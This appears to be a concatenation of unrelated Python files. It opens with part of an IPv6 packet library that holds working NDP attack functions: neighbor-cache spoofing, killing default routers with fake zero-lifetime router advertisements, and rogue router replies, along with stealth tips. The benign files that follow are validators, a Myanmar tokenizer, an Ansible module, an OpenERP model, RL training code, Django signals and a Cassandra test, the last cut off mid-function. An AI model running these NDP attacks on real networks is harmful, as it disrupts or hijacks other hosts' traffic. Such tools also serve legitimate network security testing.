The victim is not expected to check the destination address of the packet, so using a multicast address like ff02::1 should work if you want the attack to target all hosts on the link. On the contrary, if you want to be more stealth, you should provide the target address for this parameter in order for the packet to be sent only to the victim. src_mac: the MAC address used as source of the packet. By default, this is the address of the interface. If you want to be more stealth, feel free to use something else. Note that this address is not the that the victim will use to populate its neighbor cache. dst_mac: The MAC address used as destination address of the packet. If the IPv6 destination address is multicast (all-nodes, solicited node, ...), it will be computed. If the destination address is unicast, a neighbor solicitation will be performed to get the associated address. If you want the attack to be stealth, you can provide the MAC address using this parameter. loop: By default, this parameter is True, indicating that NS packets will be sent in loop, separated by 'inter' seconds (see below). When set to False, a single packet is sent. inter: When loop parameter is True (the default), this parameter provides the interval in seconds used for sending NS packets. iface: to force the sending interface. """ if not iface: iface = conf.iface # Use provided MAC address as source link-layer address option # or the MAC address of the interface if none is provided. if not src_lladdr: src_lladdr = get_if_hwaddr(iface) # Prepare packets parameters ether_params = {} if src_mac: ether_params["src"] = src_mac if dst_mac: ether_params["dst"] = dst_mac ipv6_params = {} if src: ipv6_params["src"] = src if dst: ipv6_params["dst"] = dst else: # Compute the solicited-node multicast address # associated with the target address. tmp = inet_ntop(socket.AF_INET6, in6_getnsma(inet_pton(socket.AF_INET6, target))) ipv6_params["dst"] = tmp pkt = Ether(**ether_params) pkt /= IPv6(**ipv6_params) pkt /= ICMPv6ND_NS(tgt=target) pkt /= ICMPv6NDOptSrcLLAddr(lladdr=src_lladdr) sendp(pkt, inter=inter, loop=loop, iface=iface, verbose=0) def NDP_Attack_Kill_Default_Router(iface=None, mac_src_filter=None, ip_src_filter=None, reply_mac=None, tgt_mac=None): """ The purpose of the function is to monitor incoming RA messages sent by default routers (RA with a non-zero Router Lifetime values) and invalidate them by immediately replying with fake RA messages advertising a zero Router Lifetime value. The result on receivers is that the router is immediately invalidated, i.e. the associated entry is discarded from the default router list and destination cache is updated to reflect the change. By default, the function considers all RA messages with a non-zero Router Lifetime value but provides configuration knobs to allow filtering RA sent by specific routers (Ethernet source address). With regard to emission, the multicast all-nodes address is used by default but a specific target can be used, in order for the DoS to apply only to a specific host. More precisely, following arguments can be used to change the behavior: iface: a specific interface (e.g. "eth0") of the system on which the DoS should be launched. If None is provided conf.iface is used. mac_src_filter: a mac address (e.g "00:13:72:8c:b5:69") to filter on. Only RA messages received from this source will trigger replies. If other default routers advertised their presence on the link, their clients will not be impacted by the attack. 
The default value is None: the DoS is not limited to a specific mac address. ip_src_filter: an IPv6 address (e.g. fe80::21e:bff:fe4e:3b2) to filter on. Only RA messages received from this source address will trigger replies. If other default routers advertised their presence on the link, their clients will not be impacted by the attack. The default value is None: the DoS is not limited to a specific IPv6 source address. reply_mac: allow specifying a specific source mac address for the reply, i.e. to prevent the use of the mac address of the interface. tgt_mac: allow limiting the effect of the DoS to a specific host, by sending the "invalidating RA" only to its mac address. """ def is_request(req, mac_src_filter, ip_src_filter): """ Check if packet req is a request """ if not (Ether in req and IPv6 in req and ICMPv6ND_RA in req): return 0 mac_src = req[Ether].src if mac_src_filter and mac_src != mac_src_filter: return 0 ip_src = req[IPv6].src if ip_src_filter and ip_src != ip_src_filter: return 0 # Check if this is an advertisement for a Default Router # by looking at Router Lifetime value if req[ICMPv6ND_RA].routerlifetime == 0: return 0 return 1 def ra_reply_callback(req, reply_mac, tgt_mac, iface): """ Callback that sends an RA with a 0 lifetime """ # Let's build a reply and send it src = req[IPv6].src # Prepare packets parameters ether_params = {} if reply_mac: ether_params["src"] = reply_mac if tgt_mac: ether_params["dst"] = tgt_mac # Basis of fake RA (high pref, zero lifetime) rep = Ether(**ether_params)/IPv6(src=src, dst="ff02::1") rep /= ICMPv6ND_RA(prf=1, routerlifetime=0) # Add it a PIO from the request ... tmp = req while ICMPv6NDOptPrefixInfo in tmp: pio = tmp[ICMPv6NDOptPrefixInfo] tmp = pio.payload del(pio.payload) rep /= pio # ... and source link layer address option if ICMPv6NDOptSrcLLAddr in req: mac = req[ICMPv6NDOptSrcLLAddr].lladdr else: mac = req[Ether].src rep /= ICMPv6NDOptSrcLLAddr(lladdr=mac) sendp(rep, iface=iface, verbose=0) print "Fake RA sent with source address %s" % src if not iface: iface = conf.iface # To prevent sniffing our own traffic if not reply_mac: reply_mac = get_if_hwaddr(iface) sniff_filter = "icmp6 and not ether src %s" % reply_mac sniff(store=0, filter=sniff_filter, lfilter=lambda x: is_request(x, mac_src_filter, ip_src_filter), prn=lambda x: ra_reply_callback(x, reply_mac, tgt_mac, iface), iface=iface) def NDP_Attack_Fake_Router(ra, iface=None, mac_src_filter=None, ip_src_filter=None): """ The purpose of this function is to send provided RA message at layer 2 (i.e. providing a packet starting with IPv6 will not work) in response to received RS messages. In the end, the function is a simple wrapper around sendp() that monitor the link for RS messages. It is probably better explained with an example: >>> ra = Ether()/IPv6()/ICMPv6ND_RA() >>> ra /= ICMPv6NDOptPrefixInfo(prefix="2001:db8:1::", prefixlen=64) >>> ra /= ICMPv6NDOptPrefixInfo(prefix="2001:db8:2::", prefixlen=64) >>> ra /= ICMPv6NDOptSrcLLAddr(lladdr="00:11:22:33:44:55") >>> NDP_Attack_Fake_Router(ra, iface="eth0") Fake RA sent in response to RS from fe80::213:58ff:fe8c:b573 Fake RA sent in response to RS from fe80::213:72ff:fe8c:b9ae ... Following arguments can be used to change the behavior: ra: the RA message to send in response to received RS message. iface: a specific interface (e.g. "eth0") of the system on which the DoS should be launched. If none is provided, conf.iface is used. mac_src_filter: a mac address (e.g "00:13:72:8c:b5:69") to filter on. 
Only RS messages received from this source will trigger a reply. Note that no changes to provided RA is done which imply that if you intend to target only the source of the RS using this option, you will have to set the Ethernet destination address to the same value in your RA. The default value for this parameter is None: no filtering on the source of RS is done. ip_src_filter: an IPv6 address (e.g. fe80::21e:bff:fe4e:3b2) to filter on. Only RS messages received from this source address will trigger replies. Same comment as for previous argument apply: if you use the option, you will probably want to set a specific Ethernet destination address in the RA. """ def is_request(req, mac_src_filter, ip_src_filter): """ Check if packet req is a request """ if not (Ether in req and IPv6 in req and ICMPv6ND_RS in req): return 0 mac_src = req[Ether].src if mac_src_filter and mac_src != mac_src_filter: return 0 ip_src = req[IPv6].src if ip_src_filter and ip_src != ip_src_filter: return 0 return 1 def ra_reply_callback(req, iface): """ Callback that sends an RA in reply to an RS """ src = req[IPv6].src sendp(ra, iface=iface, verbose=0) print "Fake RA sent in response to RS from %s" % src if not iface: iface = conf.iface sniff_filter = "icmp6" sniff(store=0, filter=sniff_filter, lfilter=lambda x: is_request(x, mac_src_filter, ip_src_filter), prn=lambda x: ra_reply_callback(x, iface), iface=iface) ############################################################################# ############################################################################# ### Layers binding ### ############################################################################# ############################################################################# conf.l3types.register(ETH_P_IPV6, IPv6) conf.l2types.register(31, IPv6) bind_layers(Ether, IPv6, type = 0x86dd ) bind_layers(CookedLinux, IPv6, proto = 0x86dd ) bind_layers(IPerror6, TCPerror, nh = socket.IPPROTO_TCP ) bind_layers(IPerror6, UDPerror, nh = socket.IPPROTO_UDP ) bind_layers(IPv6, TCP, nh = socket.IPPROTO_TCP ) bind_layers(IPv6, UDP, nh = socket.IPPROTO_UDP ) bind_layers(IP, IPv6, proto = socket.IPPROTO_IPV6 ) bind_layers(IPv6, IPv6, nh = socket.IPPROTO_IPV6 ) bind_layers(IPv6, IP, nh = socket.IPPROTO_IPIP )
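# --- Usage sketch (illustrative only, not part of the original module) -----
# With this module loaded in a Scapy session, a Mobile IPv6 Binding Update
# carrying an Alternate Care-of Address option could be built roughly as
# follows; the 'autopad' machinery in _MobilityOptionsField inserts the
# Pad1/PadN options required by the 8n+6 alignment rule of MIP6OptAltCoA:
#
#     p = IPv6(src="2001:db8::1", dst="2001:db8::2")
#     p /= MIP6MH_BU(flags="KHA", mhtime=15,
#                    options=[MIP6OptAltCoA(acoa="2001:db8::cafe")])
#     p.show2()        # len and cksum are filled in by post_build()
#
# An ICMPv6 Node Information name query for a peer can likewise be written
#     IPv6(dst="2001:db8::2")/ICMPv6NIQueryName(data="2001:db8::2")
# where NIQueryDataField.h2i() recognises the string as an IPv6 address.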
""" Validators check objects on asignment and do coercion if needed """ import datetime as dt import decimal class ValidationError(Exception): def __init__(self, message, class_=None, path=None, value=None, errors=None, *args, **kwargs): if errors is None: errors = [] self.errors = errors self.path = path or [] self.value = value self.class_ = class_ self.message = message super(ValidationError, self).__init__(*args, **kwargs) def __str__(self): clsname = self.class_.__name__ if self.class_ else '<No class>' path_display = ".".join([str(clsname)] + list(reversed(self.path))) return "Failed to validate {0} as {1}: {2}".format( self.value, path_display, self.message) def DummyValidator(data): "Passes through whatever comes to it" return data def SimpleTypeValidator(_type, error_classes=[ValueError]): def validator(data): error_msg = "Failed to validate as %s" % _type try: return _type(data) except tuple(error_classes) as e: raise ValidationError("{0}: {1}".format(error_msg, e)) except TypeError as e: raise ValidationError("{0}: {1}".format(error_msg, e)) return validator def StringValidator(data): if isinstance(data, str): return data raise ValidationError('Not a string') def StringIntValidator(data): if isinstance(data, str): return data if isinstance(data, int): return str(data) raise ValidationError('Not a string') def StringNumValidator(data): if isinstance(data, str): return data is_num = (isinstance(data, int) or isinstance(data, float)) if is_num: return str(data) raise ValidationError('Not a string') IntValidator = SimpleTypeValidator(int) def DecimalValidator(data): if isinstance(data, float): data = str(data) return SimpleTypeValidator( decimal.Decimal, [decimal.InvalidOperation, ValueError])(data) def CurrencyValidator(data): if not isinstance(data, str): raise ValidationError('Not a string') if len(data) != 3: raise ValidationError( 'Currency can contain two letters only [%s]' % data) return str(data) def DateTimeValidator(data): if isinstance(data, dt.datetime): return data if isinstance(data, str): try: return parse_datetime(data) except ValueError as e: raise ValidationError('Not a datetime [%s, %s]' % (data, e,)) raise ValidationError('Not a datetime [%s]' % data) def DateValidator(data): if isinstance(data, dt.datetime): return data.date() if isinstance(data, dt.date): return data if isinstance(data, str): try: return parse_date(data) except ValueError as e: raise ValidationError('Not a date [%s, %s]' % (data, e,)) raise ValidationError('Not a date [%s]' % data) def TimeValidator(data): if isinstance(data, dt.time): return data if isinstance(data, str): try: return parse_time(data) except ValueError as e: raise ValidationError('Not a time [%s, %s]' % (data, e,)) raise ValidationError('Not a time [%s]' % data) def TimeStampValidator(data): if isinstance(data, (int, float)): try: return dt.datetime.fromtimestamp(data) except (ValueError, TypeError) as exc: raise ValidationError('Not a timestamp [%s, %s]' % (data, exc,)) elif isinstance(data, str): try: return dt.datetime.fromtimestamp(float(data)) except (ValueError, TypeError) as exc: raise ValidationError('Not a timestamp [%s, %s]' % (data, exc,)) elif isinstance(data, dt.datetime): return data raise ValidationError('Not a timestamp [%s]' % data) def parse_datetime(s): parts = s.split('T') if len(parts) == 2: time_str = parts[1] if time_str[-1] == 'Z': time_str = time_str[:-1] return dt.datetime.combine(parse_date(parts[0]), parse_time(time_str)) raise ValueError('Invalid datetime format') def parse_date(s): parts = 
s.split('-') if len(parts) == 3: return dt.date(int(parts[0]), int(parts[1]), int(parts[2])) raise ValueError('Invalid date format') def parse_time(s): parts = s.split(':') if len(parts) >= 2: s = 0 mcs = 0 if len(parts) == 3: mparts = parts[2].split('.') s = int(mparts[0]) if len(mparts) > 1: mcs = int(mparts[1]) return dt.time(int(parts[0]), int(parts[1]), s, mcs) raise ValueError('Invalid time format')
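# --- Usage sketch (illustrative, not part of the original module) ----------
# Each validator is a plain callable that either returns a coerced value or
# raises ValidationError, e.g.:
#
#     IntValidator("12")                         # -> 12
#     DecimalValidator(1.5)                      # -> Decimal('1.5')
#     CurrencyValidator("USD")                   # -> 'USD'
#     DateTimeValidator("2020-01-02T03:04:05Z")  # -> datetime(2020, 1, 2, 3, 4, 5)
#     TimeStampValidator(0)                      # -> local datetime for the Unix epoch
#
# whereas CurrencyValidator("US") or DateValidator("not-a-date") raise
# ValidationError with a human-readable message.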
#!/usr/bin/env python
# -*- coding: utf-8 -*-
## Copyright Zeta Co., Ltd.
## written by @moeseth based on research by @aye_hnin_khine

import re
import wa_zero_fixer

SAFE_DELIMITER = u"\uFFFF"


def tokenize(input_string=None):
    if type(input_string) is not unicode:
        input_string = unicode(input_string, "utf8")

    input_string = wa_zero_fixer.fix(input_string=input_string)
    input_string = input_string.strip()
    input_string = re.sub(r"\n", u"\u0020", input_string)

    ## remove zero width space and zero width non-joiner
    input_string = re.sub(ur"[\u200B\u200C]", "", input_string)

    ## only remove all the *spaces* between myanmar words
    ## use a positive lookahead to match \s followed by a [\u1000-\u104F]
    ## without making the [\u1000-\u104F] part of the match
    input_string = re.sub(ur"([\u1000-\u104F])\s+(?=[\u1000-\u104F])", ur"\1", input_string)

    ## add a delimiter between digits and non-digits (excluding dot and comma)
    input_string = re.sub(ur"([^\u1040-\u1049\u002E\u002C])([\u1040-\u1049])", ur"\1`\2", input_string)
    input_string = re.sub(ur"([\u1040-\u1049])([^\u1040-\u1049\u002E\u002C])", ur"\1`\2", input_string)

    ## tokenize ။ and ၊
    input_string = re.sub(ur"(\u104A|\u104B)", ur"`\1`", input_string)

    ## auk ka mit and a tat reordering
    input_string = re.sub(ur"\u103A\u1037", ur"\u1037\u103A", input_string)

    input_string = re.sub(ur"([\u1000-\u102A\u103F\u104C-\u104F])", ur'`\1', input_string)
    input_string = re.sub(ur"`([\u1000-\u1021])([\u1039\u103A])", ur'\1\2', input_string)
    input_string = re.sub(ur"`([\u1000-\u1021])([\u1037\u103A])", ur'\1\2', input_string)
    input_string = re.sub(ur"([\u1039])`([\u1000-\u1021])", ur'\1\2', input_string)
    input_string = re.sub(ur"([\u1000-\u103F\u104C-\u104F])([!-\u00D7\u1040-\u104B\u2018-\u201D])", ur'\1`\2', input_string)

    input_string = re.sub(u"\u0020", "`", input_string)
    input_string = input_string.replace("``", "`")

    ## remove ` at the start of the input_string
    input_string = re.sub(ur"^`", "", input_string)

    input_string = input_string.replace("`", SAFE_DELIMITER)

    return input_string


def get_tokens(input_string=None):
    token_string = tokenize(input_string=input_string)
    tokens = token_string.split(SAFE_DELIMITER)
    return tokens


def get_tokens_count(input_string=None):
    tokens = get_tokens(input_string=input_string)
    return len(tokens)
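# --- Usage sketch (illustrative, not part of the original module) ----------
# get_tokens() splits a Myanmar (Burmese) string into syllable-like tokens by
# inserting SAFE_DELIMITER between clusters, e.g. (Python 2, escaped input):
#
#     text = u"\u1019\u103c\u1014\u103a\u1019\u102c\u1005\u102c"  # Burmese for "Myanmar language"
#     tokens = get_tokens(input_string=text)
#     n = get_tokens_count(input_string=text)
#
# The exact token boundaries depend on the reordering and merging rules above
# and on wa_zero_fixer.fix(), so treat any expected output as indicative only.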
#!/usr/bin/python # # Created on Aug 25, 2016 # @author: Gaurav Rastogi ([email protected]) # Eric Anderson ([email protected]) # module_check: supported # # # This file is part of Ansible # # Ansible is free software: you can redistribute it and/or modify # it under the terms of the GNU General Public License as published by # the Free Software Foundation, either version 3 of the License, or # (at your option) any later version. # # Ansible is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU General Public License for more details. # # You should have received a copy of the GNU General Public License # along with Ansible. If not, see <http://www.gnu.org/licenses/>. # ANSIBLE_METADATA = {'metadata_version': '1.1', 'status': ['preview'], 'supported_by': 'community'} DOCUMENTATION = ''' --- module: avi_prioritylabels author: Gaurav Rastogi ([email protected]) short_description: Module for setup of PriorityLabels Avi RESTful Object description: - This module is used to configure PriorityLabels object - more examples at U(https://github.com/avinetworks/devops) requirements: [ avisdk ] version_added: "2.4" options: state: description: - The state that should be applied on the entity. default: present choices: ["absent", "present"] avi_api_update_method: description: - Default method for object update is HTTP PUT. - Setting to patch will override that behavior to use HTTP PATCH. version_added: "2.5" default: put choices: ["put", "patch"] avi_api_patch_op: description: - Patch operation to use when using avi_api_update_method as patch. version_added: "2.5" choices: ["add", "replace", "delete"] cloud_ref: description: - It is a reference to an object of type cloud. description: description: - A description of the priority labels. equivalent_labels: description: - Equivalent priority labels in descending order. name: description: - The name of the priority labels. required: true tenant_ref: description: - It is a reference to an object of type tenant. url: description: - Avi controller URL of the object. uuid: description: - Uuid of the priority labels. extends_documentation_fragment: - avi ''' EXAMPLES = """ - name: Example to create PriorityLabels object avi_prioritylabels: controller: 10.10.25.42 username: admin password: something state: present name: sample_prioritylabels """ RETURN = ''' obj: description: PriorityLabels (api/prioritylabels) object returned: success, changed type: dict ''' from ansible.module_utils.basic import AnsibleModule try: from ansible.module_utils.network.avi.avi import ( avi_common_argument_spec, HAS_AVI, avi_ansible_api) except ImportError: HAS_AVI = False def main(): argument_specs = dict( state=dict(default='present', choices=['absent', 'present']), avi_api_update_method=dict(default='put', choices=['put', 'patch']), avi_api_patch_op=dict(choices=['add', 'replace', 'delete']), cloud_ref=dict(type='str',), description=dict(type='str',), equivalent_labels=dict(type='list',), name=dict(type='str', required=True), tenant_ref=dict(type='str',), url=dict(type='str',), uuid=dict(type='str',), ) argument_specs.update(avi_common_argument_spec()) module = AnsibleModule( argument_spec=argument_specs, supports_check_mode=True) if not HAS_AVI: return module.fail_json(msg=( 'Avi python API SDK (avisdk>=17.1) is not installed. 
' 'For more details visit https://github.com/avinetworks/sdk.')) return avi_ansible_api(module, 'prioritylabels', set([])) if __name__ == '__main__': main()
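# --- Additional usage sketch (illustrative only, values are hypothetical) ---
# Updating an existing object with HTTP PATCH instead of PUT uses the two
# parameters documented above:
#
#   - name: Patch an existing PriorityLabels object
#     avi_prioritylabels:
#       controller: 10.10.25.42
#       username: admin
#       password: something
#       state: present
#       avi_api_update_method: patch
#       avi_api_patch_op: add
#       name: sample_prioritylabels
#       description: labels used for pool priority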
# -*- coding: utf-8 -*- ############################################################################## # # OpenERP, Open Source Management Solution # Copyright (C) 2004-2010 Tiny SPRL (<http://tiny.be>). # Copyright (C) 2011-2013 Serpent Consulting Services Pvt. Ltd. (<http://serpentcs.com>). # # This program is free software: you can redistribute it and/or modify # it under the terms of the GNU Affero General Public License as # published by the Free Software Foundation, either version 3 of the # License, or (at your option) any later version. # # This program is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU Affero General Public License for more details. # # You should have received a copy of the GNU Affero General Public License # along with this program. If not, see <http://www.gnu.org/licenses/>. # ############################################################################## from openerp.osv import fields, osv import time from openerp import netsvc, tools from openerp.tools.translate import _ class table_area(osv.osv): _name = 'table.area' _columns = { 'name': fields.char('Area Description', required=True, size=64), 'table_ids': fields.one2many('table.table','area_id','Tables'), #Fields added to set times for tables 'open_timer': fields.integer('Open'), 'just_seated_timer': fields.integer('Just Seated'), 'order_taken_timer': fields.integer('Order Taken'), 'served_timer': fields.integer('Served'), 'check_timer': fields.integer('Check'), 'paid_timer': fields.integer('Paid'), } class table_table(osv.osv): _name = 'table.table' _columns = { 'name': fields.char('Description', required=True, size=64, select=1), 'code': fields.char('Code', size=64, required=True), 'number_of_seats':fields.integer('Number of seats'), 'max_number_of_seats':fields.integer('Maximum number of seats'), #To reserve a table there must be a wizard to specify who is going to come. Maybe a res-partner? #Also there must be a registry to log who is the one whom reserved the table (res.user) #The state of the table is going to change all the time. 
'state':fields.selection([('open','Open'), ('just_seated','Just Seated'), ('order_taken','Order Taken'), ('served','Served'), ('check','Check'), ('paid','Paid')], 'State', required=True), 'users_ids':fields.many2many('res.users', 'rel_table_table_users_rel', 'table_id', 'user_id', 'Users'), 'order_ids':fields.many2many('pos.order', 'table_pos_order_rel', 'table_id', 'order_id', 'Orders'), 'area_id': fields.many2one('table.area','Area', required=True), 'only_free_state': fields.boolean('Only Free State'), #These fields intend to store position of the tables on the interface 'col': fields.integer('Grid Col'), 'row': fields.integer('Grid Row'), 'size_x': fields.integer('Grid Size X'), 'size_y': fields.integer('Grid Size Y'), 'sector': fields.char('Sector', size=64), } _defaults = { 'state':'open', } def set_table_position(self, cr, uid, table_data): self.write(cr, uid, table_data.get('widget_id'), {'col': table_data.get('col'), 'row': table_data.get('row'), 'size_x': table_data.get('size_x'), 'size_y': table_data.get('size_y')}) return True def write(self, cr, uid, ids, vals, context=None): if context is None: context = {} if not ids: return True if vals.get('state'): if not isinstance(ids, list): ids = [ids] for table in self.browse(cr, uid, ids): if table.only_free_state: super(table_table, self).write(cr, uid, table.id, {'state': 'open'}, context=context) ids.remove(table.id) else: order_pool = self.pool.get('pos.order') order_ids = order_pool.search(cr, uid, ['&',('table_ids','in',ids),('state','=','draft')]) order_pool.write(cr, uid, order_ids, {'state_log': [[0,0,{'state': vals.get('state')}]]}) if ids: return super(table_table, self).write(cr, uid, ids, vals, context=context) else: return True class table_user(osv.osv): _inherit ='res.users' _columns = { 'table_ids':fields.many2many('table.table', 'rel_table_table_users_rel', 'user_id', 'table_id', 'Tables'), }
import torch import torch.nn as nn import torch.nn.functional as F import torch.optim as optim import numpy as np from tqdm import tqdm, trange from mushroom_rl.core import Core from mushroom_rl.environments import Gym from mushroom_rl.algorithms.actor_critic import TRPO, PPO from mushroom_rl.policy import GaussianTorchPolicy from mushroom_rl.utils.dataset import compute_J class Network(nn.Module): def __init__(self, input_shape, output_shape, n_features, **kwargs): super(Network, self).__init__() n_input = input_shape[-1] n_output = output_shape[0] self._h1 = nn.Linear(n_input, n_features) self._h2 = nn.Linear(n_features, n_features) self._h3 = nn.Linear(n_features, n_output) nn.init.xavier_uniform_(self._h1.weight, gain=nn.init.calculate_gain('relu')) nn.init.xavier_uniform_(self._h2.weight, gain=nn.init.calculate_gain('relu')) nn.init.xavier_uniform_(self._h3.weight, gain=nn.init.calculate_gain('linear')) def forward(self, state, **kwargs): features1 = F.relu(self._h1(torch.squeeze(state, 1).float())) features2 = F.relu(self._h2(features1)) a = self._h3(features2) return a def experiment(alg, env_id, horizon, gamma, n_epochs, n_steps, n_steps_per_fit, n_episodes_test, alg_params, policy_params): print(alg.__name__) mdp = Gym(env_id, horizon, gamma) critic_params = dict(network=Network, optimizer={'class': optim.Adam, 'params': {'lr': 3e-4}}, loss=F.mse_loss, n_features=32, batch_size=64, input_shape=mdp.info.observation_space.shape, output_shape=(1,)) policy = GaussianTorchPolicy(Network, mdp.info.observation_space.shape, mdp.info.action_space.shape, **policy_params) alg_params['critic_params'] = critic_params agent = alg(mdp.info, policy, **alg_params) core = Core(agent, mdp) dataset = core.evaluate(n_episodes=n_episodes_test, render=False) J = np.mean(compute_J(dataset, mdp.info.gamma)) R = np.mean(compute_J(dataset)) E = agent.policy.entropy() tqdm.write('END OF EPOCH 0') tqdm.write('J: {}, R: {}, entropy: {}'.format(J, R, E)) tqdm.write('##################################################################################################') for it in trange(n_epochs): core.learn(n_steps=n_steps, n_steps_per_fit=n_steps_per_fit) dataset = core.evaluate(n_episodes=n_episodes_test, render=False) J = np.mean(compute_J(dataset, mdp.info.gamma)) R = np.mean(compute_J(dataset)) E = agent.policy.entropy() tqdm.write('END OF EPOCH ' + str(it+1)) tqdm.write('J: {}, R: {}, entropy: {}'.format(J, R, E)) tqdm.write('##################################################################################################') print('Press a button to visualize') input() core.evaluate(n_episodes=5, render=True) if __name__ == '__main__': max_kl = .015 policy_params = dict( std_0=1., n_features=32, use_cuda=torch.cuda.is_available() ) ppo_params = dict(actor_optimizer={'class': optim.Adam, 'params': {'lr': 3e-4}}, n_epochs_policy=4, batch_size=64, eps_ppo=.2, lam=.95, quiet=True) trpo_params = dict(ent_coeff=0.0, max_kl=.01, lam=.95, n_epochs_line_search=10, n_epochs_cg=100, cg_damping=1e-2, cg_residual_tol=1e-10, quiet=True) algs_params = [ (TRPO, 'trpo', trpo_params), (PPO, 'ppo', ppo_params) ] for alg, alg_name, alg_params in algs_params: experiment(alg=alg, env_id='Pendulum-v0', horizon=200, gamma=.99, n_epochs=40, n_steps=30000, n_steps_per_fit=3000, n_episodes_test=25, alg_params=alg_params, policy_params=policy_params)
""" Signals for this application. .. py:data:: city_items_pre_import Emited by city_import() in the cities_light command for each row parsed in the data file. If a signal reciever raises InvalidItems then it will be skipped. An example is worth 1000 words: if you want to import only cities from France, USA and Belgium you could do as such:: import cities_light def filter_city_import(sender, items, **kwargs): if items[8] not in ('FR', 'US', 'BE'): raise cities_light.InvalidItems() cities_light.signals.city_items_pre_import.connect(filter_city_import) Note: this signal gets a list rather than a City instance for performance reasons. .. py:data:: region_items_pre_import Same as :py:data:`~cities_light.signals.city_items_pre_import`. .. py:data:: country_items_pre_import Same as :py:data:`~cities_light.signals.region_items_pre_import` and :py:data:`cities_light.signals.city_items_pre_import`. .. py:data:: translation_items_pre_import Same as :py:data:`~cities_light.signals.region_items_pre_import` and :py:data:`cities_light.signals.city_items_pre_import`. Note: Be careful because of long runtime; it will be called VERY often. .. py:data:: city_items_post_import Emited by city_import() in the cities_light command for each row parsed in the data file, right before saving City object. Along with City instance it pass items with geonames data. Will be useful, if you define custom cities models with ``settings.CITIES_LIGHT_APP_NAME``. Example:: import cities_light def process_city_import(sender, instance, items, **kwargs): instance.timezone = items[17] cities_light.signals.city_items_post_import.connect(process_city_import) .. py:data:: region_items_post_import Same as :py:data:`~cities_light.signals.city_items_post_import`. .. py:data:: country_items_post_import Same as :py:data:`~cities_light.signals.region_items_post_import` and :py:data:`cities_light.signals.city_items_post_import`. """ from __future__ import unicode_literals import django.dispatch __all__ = ['city_items_pre_import', 'region_items_pre_import', 'country_items_pre_import', 'city_items_post_import', 'region_items_post_import', 'country_items_post_import', 'translation_items_pre_import'] city_items_pre_import = django.dispatch.Signal(providing_args=['items']) region_items_pre_import = django.dispatch.Signal(providing_args=['items']) country_items_pre_import = django.dispatch.Signal(providing_args=['items']) translation_items_pre_import = django.dispatch.Signal(providing_args=['items']) city_items_post_import = django.dispatch.Signal( providing_args=['instance', 'items']) region_items_post_import = django.dispatch.Signal( providing_args=['instance', 'items']) country_items_post_import = django.dispatch.Signal( providing_args=['instance', 'items'])
import os
import subprocess
import time

import pytest
import parse
import logging

from cassandra.util import sortedset
from ccmlib import common

from dtest import Tester
from tools.data import rows_to_list

since = pytest.mark.since
logger = logging.getLogger(__name__)


@since('2.0.16', max_version='3.0.0')
class TestTokenGenerator(Tester):
    """
    Basic tools/bin/token-generator test.
    Token-generator was removed in CASSANDRA-5261
    @jira_ticket CASSANDRA-5261
    @jira_ticket CASSANDRA-9300
    """

    def call_token_generator(self, install_dir, randomPart, nodes):
        executable = os.path.join(install_dir, 'tools', 'bin', 'token-generator')
        if common.is_win():
            executable += ".bat"

        args = [executable]
        if randomPart is not None:
            if randomPart:
                args.append("--random")
            else:
                args.append("--murmur3")

        for n in nodes:
            args.append(str(n))

        logger.debug('Invoking {}'.format(args))
        token_gen_output = subprocess.check_output(args).decode()
        lines = token_gen_output.split("\n")
        dc_tokens = None
        generated_tokens = []
        for line in lines:
            if line.startswith("DC #"):
                if dc_tokens is not None:
                    assert len(dc_tokens) > 0, "dc_tokens is empty from token-generator {}".format(args)
                    generated_tokens.append(dc_tokens)
                dc_tokens = []
            else:
                if line:
                    m = parse.search('Node #{node_num:d}:{:s}{node_token:d}', line)
                    assert m, "Line \"{}\" does not match pattern from token-generator {}".format(line, args)
                    node_num = int(m.named['node_num'])
                    node_token = int(m.named['node_token'])
                    dc_tokens.append(node_token)
                    assert node_num == len(dc_tokens), "invalid token count from token-generator {}".format(args)
        assert dc_tokens is not None, "No tokens from token-generator {}".format(args)
        assert len(dc_tokens) > 0, "No tokens from token-generator {}".format(args)
        generated_tokens.append(dc_tokens)

        return generated_tokens

    def prepare(self, randomPart=None, nodes=1):
        cluster = self.cluster

        install_dir = cluster.get_install_dir()
        generated_tokens = self.call_token_generator(install_dir, randomPart, [nodes])

        if not randomPart:
            cluster.set_partitioner("org.apache.cassandra.dht.Murmur3Partitioner")
        else:
            if randomPart:
                cluster.set_partitioner("org.apache.cassandra.dht.RandomPartitioner")
            else:
                cluster.set_partitioner("org.apache.cassandra.dht.Murmur3Partitioner")

        # remove these from cluster options - otherwise node's config would be overridden with cluster._config_options_
        cluster._config_options.__delitem__('num_tokens')
        if self.dtest_config.use_vnodes:
            cluster._config_options.__delitem__('initial_token')

        assert not cluster.nodelist(), "nodelist() already initialized"
        cluster.populate(nodes, use_vnodes=False, tokens=generated_tokens[0]).start(wait_for_binary_proto=True)
        time.sleep(0.2)

        node = cluster.nodelist()[0]
        session = self.patient_cql_connection(node)
        return generated_tokens, session

    def _token_gen_test(self, nodes, randomPart=None):
        generated_tokens, session = self.prepare(randomPart, nodes=nodes)
        dc_tokens = generated_tokens[0]

        tokens = []
        local_tokens = rows_to_list(session.execute("SELECT tokens FROM system.local"))[0]
        assert len(local_tokens) == 1, "too many tokens for peer"
        for tok in local_tokens:
            tokens += tok

        rows = rows_to_list(session.execute("SELECT tokens FROM system.peers"))
        assert len(rows) == nodes - 1
        for row in rows:
            peer_tokens = row[0]
            assert len(peer_tokens) == 1, "too many tokens for peer"
            for tok in peer_tokens:
                tokens.append(tok)

        assert len(tokens) == len(dc_tokens)
        for cluster_token in tokens:
            tok = int(cluster_token)
            assert dc_tokens.index(tok) >= 0, "token in cluster does not match generated tokens"

    def token_gen_def_test(self, nodes=3):
        """ Validate token-generator with Murmur3Partitioner with default token-generator behavior """
        self._token_gen_test(nodes)

    def token_gen_murmur3_test(self, nodes=3):
        """ Validate token-generator with Murmur3Partitioner with explicit murmur3 """
        self._token_gen_test(nodes, False)

    def token_gen_random_test(self, nodes=3):
        """ Validate token-generator with RandomPartitioner with explicit random """
        self._token_gen_test(nodes, True)

    dc_nodes_combinations = [
        [3, 5],
        [3, 5, 5],
        [12, 5, 7],
        [50, 100, 250],
        [100, 100, 100],
        [250, 250, 250],
        [1000, 1000, 1000],
        [2500, 2500, 2500, 2500]
    ]

    def _multi_dc_tokens(self, random=None):
        t_min = 0
        t_max = 1 << 127
